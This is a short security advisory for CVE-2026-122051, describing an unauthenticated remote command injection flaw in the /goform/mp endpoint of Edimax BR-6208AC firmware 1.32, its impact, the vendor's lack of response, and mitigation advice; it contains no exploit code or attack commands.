CVE-2026-122051
Overview
The vulnerability is a command injection flaw within the Edimax BR-6208AC firmware version 1.32. It originates from improper input validation in the handling of requests targeting the /goform/mp endpoint, allowing untrusted input to be executed as system commands. This flaw resides in an unspecified functionality related to processing parameters of the /goform/mp resource.
Vulnerability Description
A flaw has been found in Edimax BR-6208AC 1.32. Affected by this vulnerability is an unknown functionality of the file /goform/mp. Executing a manipulation can lead to command injection. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Impact
An unauthenticated remote attacker can execute arbitrary commands on the affected device, gaining full control over the router's operating system. This enables compromise of network traffic, device configuration, and potentially lateral movement within the internal network. No user interaction or credentials are required to exploit this vulnerability, allowing immediate and complete system compromise upon successful attack.
Solution
No official vendor response or patch has been issued as the vendor did not respond to disclosure attempts. Users should monitor the Edimax website or trusted vulnerability databases for future firmware updates addressing this issue. Until a patch is available, network administrators should restrict external access to the device’s management interfaces and implement network-level protections to mitigate exposure.
